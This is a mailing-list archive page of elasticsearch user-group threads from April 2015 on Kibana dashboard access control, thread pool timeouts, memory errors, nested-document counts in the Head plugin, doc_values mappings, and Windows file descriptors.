Re: Access to specific kibana dashboards

2015-04-16 Thread Rubaiyat Islam Sadat
Thanks Mark for your kind reply. Would you a be bit more specific as I am a 
newbie? I am sorry if I had not been clear enough what I want to achieve. 
As far as I know that Apache level access is based on relative static 
path/url, it won’t know detail how kibana works. I would like to restrict 
access to 'some' of the kibana dashboards, not all. Is it possible to 
achieve by configuring on the Kibana side? If on the apache side, do I have 
restrict the specific URLs of the Kibana dashboard to the specific group of 
people, e.g. as follows.


Order deny,allow
deny from all
allow from 192.168.
allow from 104.113.
  

  
Order deny,allow
deny from all
allow from 192.168.
allow from 104.113.
  

In this case, for example, if I want to restrict an URL like 
http://myESHost:9200/_plugin/kopf/#/!/cluster, what do I have to put after 
. Sorry if I have asked a very naive question.

Thanks again for your time.

Cheers!
Ruby

On Friday, April 17, 2015 at 12:23:50 AM UTC+2, Mark Walkom wrote:
>
> You could do this with apache/nginx ACLs as KB3 simply loads a path, 
> either a file from the server's FS or from ES.
>
> If you load it up you will see it in the URL.
>
> On 16 April 2015 at 21:58, Rubaiyat Islam Sadat  > wrote:
>
>> Hi all,
>>
>> As a completely newbie here, I am going to ask you a question which you 
>> might find find naive (or stupid!). I have a scenario where I would like to 
>> restrict access from specific locations (say, IP addresses) to access 
>> *'specific'* dashboards in Kibana. As far as I know that Apache level 
>> access is based on relative static path/url, it won’t know detail how 
>> kibana works. Is there any way/suggestion to control which users can load 
>> which dashboards? Or may be I'm wrong, there is a way to do that. Your 
>> suggestions would be really helpful. I am using Kibana 3 and I am not in a 
>> position to use Shield.
>>
>> Cheers!
>> Ruby
>>
>> -- 
>> You received this message because you are subscribed to the Google Groups 
>> "elasticsearch" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to elasticsearc...@googlegroups.com .
>> To view this discussion on the web visit 
>> https://groups.google.com/d/msgid/elasticsearch/cc652358-4d42-4263-9238-a76f42de5dad%40googlegroups.com
>>  
>> 
>> .
>> For more options, visit https://groups.google.com/d/optout.
>>
>
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/3ca9c8e6-4861-46dc-9b34-b64931b46869%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Saturating the management thread pool

2015-04-16 Thread Mark Walkom
Also related https://github.com/elastic/elasticsearch/issues/10447

On 17 April 2015 at 12:37, Charlie Moad  wrote:

> This was tracked down to a problem with Ubuntu 14.04 running under Xen (in
> AWS). The latest kernel in Ubuntu resolves the problem, so I had to do a
> rolling "apt-get update; apt-get dist-upgrade; reboot" on all nodes. This
> appears to have resolved the issue.
>
> For reference:
> https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1317811
>
>
> On Thursday, April 16, 2015 at 11:20:06 AM UTC-4, Charlie Moad wrote:
>>
>> A few days ago we started to receive a lot of timeouts across our
>> cluster. This is causing shard allocation to fail and a perpetual
>> red/yellow state.
>>
>> Examples:
>> [2015-04-16 15:04:50,970][DEBUG][action.admin.cluster.node.stats]
>> [coordinator02] failed to execute on node [1rfWT-mXTZmF_NzR_h1IZw]
>> org.elasticsearch.transport.ReceiveTimeoutTransportException:
>> [search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][cluster:monitor/nodes/stats[n]]
>> request_id [3680727] timed out after [15001ms]
>> at
>> org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
>> at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>> at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>> at java.lang.Thread.run(Thread.java:745)
>>
>> [2015-04-16 15:03:26,105][WARN ][gateway.local]
>> [coordinator02] [global.y2014m01d30.v2][0]: failed to list shard stores on
>> node [1rfWT-mXTZmF_NzR_h1IZw]
>> org.elasticsearch.action.FailedNodeException: Failed node
>> [1rfWT-mXTZmF_NzR_h1IZw]
>> at
>> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.onFailure(TransportNodesOperationAction.java:206)
>> at
>> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.access$1000(TransportNodesOperationAction.java:97)
>>
>> at
>> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction$4.handleException(TransportNodesOperationAction.java:178)
>> at
>> org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
>> at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>> at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>> at java.lang.Thread.run(Thread.java:745)
>> Caused by: org.elasticsearch.transport.ReceiveTimeoutTransportException:
>> [search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][internal:cluster/nodes/indices/shard/store[n]]
>> request_id [3677537] timed out after [30001ms]
>> ... 4 more
>>
>> I believe I have tracked this down to the management thread pool being
>> saturated on our data nodes and not responding to requests. Our cluster has
>> 3 master nodes,no data and 3 worker nodes,no master. I increased the
>> maximum pool size from 5 to 20 and the workers immediately jumped to 20.
>> I'm still seeing the errors.
>>
>> hostmanagement.type management.active
>> management.size management.queue management.queueSize management.rejected
>> management.largest management.completed management.min management.max
>> management.keepAlive
>> coordinator01   scaling 1
>>   200
>>237884  1 20
>> 5m
>> search02scaling 1
>>  2000
>>   20  1945337  1 20
>> 5m
>> search01scaling 1
>>  2000
>>   20  2034838  1 20
>> 5m
>> search03scaling 1
>>  2000
>>   20  1862848  1 20
>> 5m
>> coordinator03   scaling 1
>>   200
>>237875  1 20
>> 5m
>> coordinator02   scaling 2
>>   500
>>544127  1 20
>> 5m
>>
>> How can I address this problem?
>>
>> Thanks,
>>  Charlie
>>
>  --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/c49d0468-2d02-49f7-8356-4b9865842eb0%40googlegroups.com
> 

Re: ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread Manjula Piyumal
Hi Jörg,

Thanks a lot for your help. May I know what is the size of one record that
you are publishing to ES. And did you do any configuration changes to the
default configurations?

Thanks
Manjula

On Fri, Apr 17, 2015 at 2:51 AM, joergpra...@gmail.com <
joergpra...@gmail.com> wrote:

> I have thousands of concurrent indexing/queries running per second on
> non-virtualized servers.
>
> 4G heap is ok, it is more than enough, there should be other reasons for
> OOM I am sure.
>
> Maybe Bigdesk can help for monitoring heap and cache eviction rates.
>
> I think I can not help any more - no experience with EC2.
>
> Jörg
>
> On Thu, Apr 16, 2015 at 8:05 PM, Manjula Piyumal  > wrote:
>
>> Hi Jörg,
>>
>> Sorry, my bad. It's a typo, I have used 4GB heap for all three ES
>> servers. I have tried without limiting the cache size as the first attempt.
>> But it also got the out of memory error. Am I not missing any other
>> configuration? Or is this load is too much for 4GB heap?
>>
>> Thanks
>> Manjula
>>
>> --
>> You received this message because you are subscribed to the Google Groups
>> "elasticsearch" group.
>> To unsubscribe from this group and stop receiving emails from it, send an
>> email to elasticsearch+unsubscr...@googlegroups.com.
>> To view this discussion on the web visit
>> https://groups.google.com/d/msgid/elasticsearch/c41b0dd9-31b8-45ee-909e-0f5e2995c4ac%40googlegroups.com
>> 
>> .
>>
>> For more options, visit https://groups.google.com/d/optout.
>>
>
>  --
> You received this message because you are subscribed to a topic in the
> Google Groups "elasticsearch" group.
> To unsubscribe from this topic, visit
> https://groups.google.com/d/topic/elasticsearch/ci_YFAPLYX4/unsubscribe.
> To unsubscribe from this group and all its topics, send an email to
> elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/CAKdsXoEF0pFDGWHiUjBYShTSMBmk%3D-zMW8mkZQMqNpMO74sNPA%40mail.gmail.com
> 
> .
>
> For more options, visit https://groups.google.com/d/optout.
>



-- 
*Manjula Piyumal De Silva*

Software Engineer,
AdroitLogic Private Ltd,

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAFLAp0Wnsw8ujLV0Bz8vi7tswwZkcSb9HHN1LR17JnNV_5B%2BVA%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Xudong You
Thanks Glen!

On Friday, April 17, 2015 at 11:14:36 AM UTC+8, Glen Smith wrote:
>
> Go to the "browser" tab and select the type. That will show the count you 
> are looking for.
>
>
>
> On Thursday, April 16, 2015 at 10:44:29 PM UTC-4, Xudong You wrote:
>>
>> Just figured out that the doc count is actually the number of document + 
>> the number of items of nested field, in my case, the QueryClicks field has 
>> two items, then the total number of doc shown on head is 1+2=3.
>> But this might confuse the people who view doc counts on head or other UI 
>> plug-in.
>>
>> Is there anyway let head just show the doc count, regarding if the doc 
>> has nested field or not.
>>
>>
>> On Thursday, April 16, 2015 at 5:36:04 PM UTC+8, Xudong You wrote:
>>>
>>> I was confused by the docs count value displaying in head plugin if 
>>> there is nest type field define in mapping
>>>
>>> For example, I created a new index with following mapping:
>>> {
>>> "mappings" : {
>>> "doc" : {
>>> "properties" : {
>>> "QueryClicks" : {
>>> "type" : "nested",
>>> "properties" : {
>>> "Count" : {
>>> "type" : "long"
>>> },
>>> "Term" : {
>>> "type" : "string"
>>> }
>>> }
>>> },
>>> "Title" : {
>>> "type" : "string"
>>> }
>>> }
>>> }
>>> }
>>> }
>>>
>>> And then insert ONE doc:
>>> {
>>>   
>>> "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
>>>   "Title":"test title"
>>> }
>>>
>>> Then refresh Head, the docs shown on Head is 3:
>>> size: 3.57ki (6.97ki)
>>> docs: 3 (3)
>>>
>>> Why?
>>>
>>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/c6512d9d-b4ff-49ca-b255-c934cfba146b%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Glen Smith
Go to the "browser" tab and select the type. That will show the count you 
are looking for.



On Thursday, April 16, 2015 at 10:44:29 PM UTC-4, Xudong You wrote:
>
> Just figured out that the doc count is actually the number of document + 
> the number of items of nested field, in my case, the QueryClicks field has 
> two items, then the total number of doc shown on head is 1+2=3.
> But this might confuse the people who view doc counts on head or other UI 
> plug-in.
>
> Is there anyway let head just show the doc count, regarding if the doc has 
> nested field or not.
>
>
> On Thursday, April 16, 2015 at 5:36:04 PM UTC+8, Xudong You wrote:
>>
>> I was confused by the docs count value displaying in head plugin if there 
>> is nest type field define in mapping
>>
>> For example, I created a new index with following mapping:
>> {
>> "mappings" : {
>> "doc" : {
>> "properties" : {
>> "QueryClicks" : {
>> "type" : "nested",
>> "properties" : {
>> "Count" : {
>> "type" : "long"
>> },
>> "Term" : {
>> "type" : "string"
>> }
>> }
>> },
>> "Title" : {
>> "type" : "string"
>> }
>> }
>> }
>> }
>> }
>>
>> And then insert ONE doc:
>> {
>>   "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
>>   "Title":"test title"
>> }
>>
>> Then refresh Head, the docs shown on Head is 3:
>> size: 3.57ki (6.97ki)
>> docs: 3 (3)
>>
>> Why?
>>
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/bf13dc04-a9c7-4cd4-9136-a9f8fcf1567f%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Xudong You
Just figured out that the doc count is actually the number of document + 
the number of items of nested field, in my case, the QueryClicks field has 
two items, then the total number of doc shown on head is 1+2=3.
But this might confuse the people who view doc counts on head or other UI 
plug-in.

Is there anyway let head just show the doc count, regarding if the doc has 
nested field or not.


On Thursday, April 16, 2015 at 5:36:04 PM UTC+8, Xudong You wrote:
>
> I was confused by the docs count value displaying in head plugin if there 
> is nest type field define in mapping
>
> For example, I created a new index with following mapping:
> {
> "mappings" : {
> "doc" : {
> "properties" : {
> "QueryClicks" : {
> "type" : "nested",
> "properties" : {
> "Count" : {
> "type" : "long"
> },
> "Term" : {
> "type" : "string"
> }
> }
> },
> "Title" : {
> "type" : "string"
> }
> }
> }
> }
> }
>
> And then insert ONE doc:
> {
>   "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
>   "Title":"test title"
> }
>
> Then refresh Head, the docs shown on Head is 3:
> size: 3.57ki (6.97ki)
> docs: 3 (3)
>
> Why?
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/b6dc87e7-f242-40f9-9ab0-d98c0c08e2c0%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Saturating the management thread pool

2015-04-16 Thread Charlie Moad
This was tracked down to a problem with Ubuntu 14.04 running under Xen (in 
AWS). The latest kernel in Ubuntu resolves the problem, so I had to do a 
rolling "apt-get update; apt-get dist-upgrade; reboot" on all nodes. This 
appears to have resolved the issue.

For reference: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1317811

On Thursday, April 16, 2015 at 11:20:06 AM UTC-4, Charlie Moad wrote:
>
> A few days ago we started to receive a lot of timeouts across our cluster. 
> This is causing shard allocation to fail and a perpetual red/yellow state.
>
> Examples:
> [2015-04-16 15:04:50,970][DEBUG][action.admin.cluster.node.stats] 
> [coordinator02] failed to execute on node [1rfWT-mXTZmF_NzR_h1IZw]
> org.elasticsearch.transport.ReceiveTimeoutTransportException: 
> [search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][cluster:monitor/nodes/stats[n]]
>  
> request_id [3680727] timed out after [15001ms]
> at 
> org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
> at 
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
> at 
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
> at java.lang.Thread.run(Thread.java:745)
>
> [2015-04-16 15:03:26,105][WARN ][gateway.local] 
> [coordinator02] [global.y2014m01d30.v2][0]: failed to list shard stores on 
> node [1rfWT-mXTZmF_NzR_h1IZw]
> org.elasticsearch.action.FailedNodeException: Failed node 
> [1rfWT-mXTZmF_NzR_h1IZw]
> at 
> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.onFailure(TransportNodesOperationAction.java:206)
> at 
> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.access$1000(TransportNodesOperationAction.java:97)
>
> at 
> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction$4.handleException(TransportNodesOperationAction.java:178)
> at 
> org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
> at 
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
> at 
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
> at java.lang.Thread.run(Thread.java:745)
> Caused by: org.elasticsearch.transport.ReceiveTimeoutTransportException: 
> [search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][internal:cluster/nodes/indices/shard/store[n]]
>  
> request_id [3677537] timed out after [30001ms]
> ... 4 more
>
> I believe I have tracked this down to the management thread pool being 
> saturated on our data nodes and not responding to requests. Our cluster has 
> 3 master nodes,no data and 3 worker nodes,no master. I increased the 
> maximum pool size from 5 to 20 and the workers immediately jumped to 20. 
> I'm still seeing the errors.
>
> hostmanagement.type management.active 
> management.size management.queue management.queueSize management.rejected 
> management.largest management.completed management.min management.max 
> management.keepAlive 
> coordinator01   scaling 1 
>   200   
>237884  1 20   
> 5m 
> search02scaling 1 
>  2000   
>   20  1945337  1 20   
> 5m 
> search01scaling 1 
>  2000   
>   20  2034838  1 20   
> 5m 
> search03scaling 1 
>  2000   
>   20  1862848  1 20   
> 5m 
> coordinator03   scaling 1 
>   200   
>237875  1 20   
> 5m 
> coordinator02   scaling 2 
>   500   
>544127  1 20   
> 5m 
>
> How can I address this problem?
>
> Thanks,
>  Charlie
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/

Re: Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Xudong You
BTW: If I just remove the "type":"nested" from the mapping, the doc count 
then is correct after insert one document.
Anyone has suggestions resolve this issue?

On Thursday, April 16, 2015 at 5:36:04 PM UTC+8, Xudong You wrote:
>
> I was confused by the docs count value displaying in head plugin if there 
> is nest type field define in mapping
>
> For example, I created a new index with following mapping:
> {
> "mappings" : {
> "doc" : {
> "properties" : {
> "QueryClicks" : {
> "type" : "nested",
> "properties" : {
> "Count" : {
> "type" : "long"
> },
> "Term" : {
> "type" : "string"
> }
> }
> },
> "Title" : {
> "type" : "string"
> }
> }
> }
> }
> }
>
> And then insert ONE doc:
> {
>   "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
>   "Title":"test title"
> }
>
> Then refresh Head, the docs shown on Head is 3:
> size: 3.57ki (6.97ki)
> docs: 3 (3)
>
> Why?
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/6173334c-dbc6-46f7-b191-5c2f92421392%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Could use some help with using Doc Values

2015-04-16 Thread Scott Chapman
Thanks. The field I wanted to map was @timestamp which isn't explicitly in 
the template. What would it look like?

Also, once I have made the change to my template, what's the right way to 
test it (validate that for a new index i is using Doc Value for the 
specific field)?

On Thursday, April 16, 2015 at 7:57:41 PM UTC-4, Mark Walkom wrote:
>
> As per the docs just add this;
>
> "@version" : {
> "index" : "not_analyzed",
> "type" : "string",
> *"doc_values": true*
>   }
>
> On 17 April 2015 at 09:35, Scott Chapman  > wrote:
>
>> Thanks, that's what I thought.
>>
>> So, please help me with my template I gave above. I am familiar with up 
>> to update it, I am just not real sure on how to change it so that a 
>> specific field uses Doc View. Or if it is easier to make it the default for 
>> all fields I suppose that's fine too since it sounds like that will happen 
>> eventually.
>>
>> Just need help with what the structure of the template should be... 
>> Thanks!
>>
>> On Wednesday, April 15, 2015 at 8:29:28 PM UTC-4, Mark Walkom wrote:
>>>
>>> Yes that is correct, you have to update your mappings and wait for new 
>>> indices to be created from it, it's not something that can be applied 
>>> retroactively without reindexing.
>>>
>>> On 16 April 2015 at 09:55, Scott Chapman  wrote:
>>>
 Yea, that's where I started with it. But, if I understand it, that 
 looks like how I can change the mapping for a specific property. But I 
 would think I need to make a similar change to my index template otherwise 
 new indexes that get created will no long have that mapping. Or am I 
 misunderstanding?

 On Wednesday, April 15, 2015 at 7:20:22 PM UTC-4, Mark Walkom wrote:
>
> Start here and you'll be good to go - http://www.elastic.co/guide/
> en/elasticsearch/guide/current/doc-values.html
>
> On 16 April 2015 at 08:03, Scott Chapman  wrote:
>
>> Probably. I just need some help figuring out how to do that. Help?
>>
>> On Wednesday, April 15, 2015 at 5:42:55 PM UTC-4, Mark Walkom wrote:
>>>
>>> You should, ideally, be using it for anything that isn't analysed.
>>>
>>  -- 
>> You received this message because you are subscribed to the Google 
>> Groups "elasticsearch" group.
>> To unsubscribe from this group and stop receiving emails from it, 
>> send an email to elasticsearc...@googlegroups.com.
>> To view this discussion on the web visit https://groups.google.com/d/
>> msgid/elasticsearch/95184c87-6471-489b-bc01-0883ea80181f%
>> 40googlegroups.com 
>> 
>> .
>> For more options, visit https://groups.google.com/d/optout.
>>
>
>  -- 
 You received this message because you are subscribed to the Google 
 Groups "elasticsearch" group.
 To unsubscribe from this group and stop receiving emails from it, send 
 an email to elasticsearc...@googlegroups.com.
 To view this discussion on the web visit 
 https://groups.google.com/d/msgid/elasticsearch/df144d62-feaa-4249-aba9-b6c8aa117c50%40googlegroups.com
  
 
 .
 For more options, visit https://groups.google.com/d/optout.

>>>
>>>  -- 
>> You received this message because you are subscribed to the Google Groups 
>> "elasticsearch" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to elasticsearc...@googlegroups.com .
>> To view this discussion on the web visit 
>> https://groups.google.com/d/msgid/elasticsearch/eb799d79-c4ec-4fbf-ab21-d67862f08bb0%40googlegroups.com
>>  
>> 
>> .
>> For more options, visit https://groups.google.com/d/optout.
>>
>
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/39619d42-60ce-45bd-805e-de6306d34477%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Could use some help with using Doc Values

2015-04-16 Thread Mark Walkom
As per the docs just add this;

"@version" : {
"index" : "not_analyzed",
"type" : "string",
*"doc_values": true*
  }

On 17 April 2015 at 09:35, Scott Chapman  wrote:

> Thanks, that's what I thought.
>
> So, please help me with my template I gave above. I am familiar with up to
> update it, I am just not real sure on how to change it so that a specific
> field uses Doc View. Or if it is easier to make it the default for all
> fields I suppose that's fine too since it sounds like that will happen
> eventually.
>
> Just need help with what the structure of the template should be... Thanks!
>
> On Wednesday, April 15, 2015 at 8:29:28 PM UTC-4, Mark Walkom wrote:
>>
>> Yes that is correct, you have to update your mappings and wait for new
>> indices to be created from it, it's not something that can be applied
>> retroactively without reindexing.
>>
>> On 16 April 2015 at 09:55, Scott Chapman  wrote:
>>
>>> Yea, that's where I started with it. But, if I understand it, that looks
>>> like how I can change the mapping for a specific property. But I would
>>> think I need to make a similar change to my index template otherwise new
>>> indexes that get created will no long have that mapping. Or am I
>>> misunderstanding?
>>>
>>> On Wednesday, April 15, 2015 at 7:20:22 PM UTC-4, Mark Walkom wrote:

 Start here and you'll be good to go - http://www.elastic.co/guide/
 en/elasticsearch/guide/current/doc-values.html

 On 16 April 2015 at 08:03, Scott Chapman  wrote:

> Probably. I just need some help figuring out how to do that. Help?
>
> On Wednesday, April 15, 2015 at 5:42:55 PM UTC-4, Mark Walkom wrote:
>>
>> You should, ideally, be using it for anything that isn't analysed.
>>
>  --
> You received this message because you are subscribed to the Google
> Groups "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send
> an email to elasticsearc...@googlegroups.com.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/elasticsearch/95184c87-6471-489b-bc01-0883ea80181f%
> 40googlegroups.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

  --
>>> You received this message because you are subscribed to the Google
>>> Groups "elasticsearch" group.
>>> To unsubscribe from this group and stop receiving emails from it, send
>>> an email to elasticsearc...@googlegroups.com.
>>> To view this discussion on the web visit
>>> https://groups.google.com/d/msgid/elasticsearch/df144d62-feaa-4249-aba9-b6c8aa117c50%40googlegroups.com
>>> 
>>> .
>>> For more options, visit https://groups.google.com/d/optout.
>>>
>>
>>  --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/eb799d79-c4ec-4fbf-ab21-d67862f08bb0%40googlegroups.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAEYi1X_Zww%2BFtg6Pxcmmn_Ak8FAenF9Ui17f7BCnZwsvrjKOeQ%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: Could use some help with using Doc Values

2015-04-16 Thread Scott Chapman
Thanks, that's what I thought.

So, please help me with my template I gave above. I am familiar with up to 
update it, I am just not real sure on how to change it so that a specific 
field uses Doc View. Or if it is easier to make it the default for all 
fields I suppose that's fine too since it sounds like that will happen 
eventually.

Just need help with what the structure of the template should be... Thanks!

On Wednesday, April 15, 2015 at 8:29:28 PM UTC-4, Mark Walkom wrote:
>
> Yes that is correct, you have to update your mappings and wait for new 
> indices to be created from it, it's not something that can be applied 
> retroactively without reindexing.
>
> On 16 April 2015 at 09:55, Scott Chapman  > wrote:
>
>> Yea, that's where I started with it. But, if I understand it, that looks 
>> like how I can change the mapping for a specific property. But I would 
>> think I need to make a similar change to my index template otherwise new 
>> indexes that get created will no long have that mapping. Or am I 
>> misunderstanding?
>>
>> On Wednesday, April 15, 2015 at 7:20:22 PM UTC-4, Mark Walkom wrote:
>>>
>>> Start here and you'll be good to go - http://www.elastic.co/guide/
>>> en/elasticsearch/guide/current/doc-values.html
>>>
>>> On 16 April 2015 at 08:03, Scott Chapman  wrote:
>>>
 Probably. I just need some help figuring out how to do that. Help?

 On Wednesday, April 15, 2015 at 5:42:55 PM UTC-4, Mark Walkom wrote:
>
> You should, ideally, be using it for anything that isn't analysed.
>
  -- 
 You received this message because you are subscribed to the Google 
 Groups "elasticsearch" group.
 To unsubscribe from this group and stop receiving emails from it, send 
 an email to elasticsearc...@googlegroups.com.
 To view this discussion on the web visit https://groups.google.com/d/
 msgid/elasticsearch/95184c87-6471-489b-bc01-0883ea80181f%
 40googlegroups.com 
 
 .
 For more options, visit https://groups.google.com/d/optout.

>>>
>>>  -- 
>> You received this message because you are subscribed to the Google Groups 
>> "elasticsearch" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to elasticsearc...@googlegroups.com .
>> To view this discussion on the web visit 
>> https://groups.google.com/d/msgid/elasticsearch/df144d62-feaa-4249-aba9-b6c8aa117c50%40googlegroups.com
>>  
>> 
>> .
>> For more options, visit https://groups.google.com/d/optout.
>>
>
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/eb799d79-c4ec-4fbf-ab21-d67862f08bb0%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Access to specific kibana dashboards

2015-04-16 Thread Mark Walkom
You could do this with apache/nginx ACLs as KB3 simply loads a path, either
a file from the server's FS or from ES.

If you load it up you will see it in the URL.

On 16 April 2015 at 21:58, Rubaiyat Islam Sadat <
rubaiyatislam.sa...@gmail.com> wrote:

> Hi all,
>
> As a completely newbie here, I am going to ask you a question which you
> might find find naive (or stupid!). I have a scenario where I would like to
> restrict access from specific locations (say, IP addresses) to access
> *'specific'* dashboards in Kibana. As far as I know that Apache level
> access is based on relative static path/url, it won’t know detail how
> kibana works. Is there any way/suggestion to control which users can load
> which dashboards? Or may be I'm wrong, there is a way to do that. Your
> suggestions would be really helpful. I am using Kibana 3 and I am not in a
> position to use Shield.
>
> Cheers!
> Ruby
>
> --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/cc652358-4d42-4263-9238-a76f42de5dad%40googlegroups.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAEYi1X-YUiseERc6XxpSdP56aw9KUsZPyGPH9JH9g4spqD0Z_g%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: How to configure max file descriptors on windows OS?

2015-04-16 Thread Mark Walkom
-1 means unbound, ie unlimited.

On 16 April 2015 at 20:54, Xudong You  wrote:

> Anyone knows how to change the max_file_descriptors on windows?
> I built ES cluster on Windows and got following process information:
>
> "max_file_descriptors" : -1,
> "open_file_descriptors" : -1,
>
> What does “-1 mean?
> Is it possible to change the max file descriptors on windows platform?
>
> --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/aa22c565-80f5-4228-8f03-15d1b1e3f150%40googlegroups.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
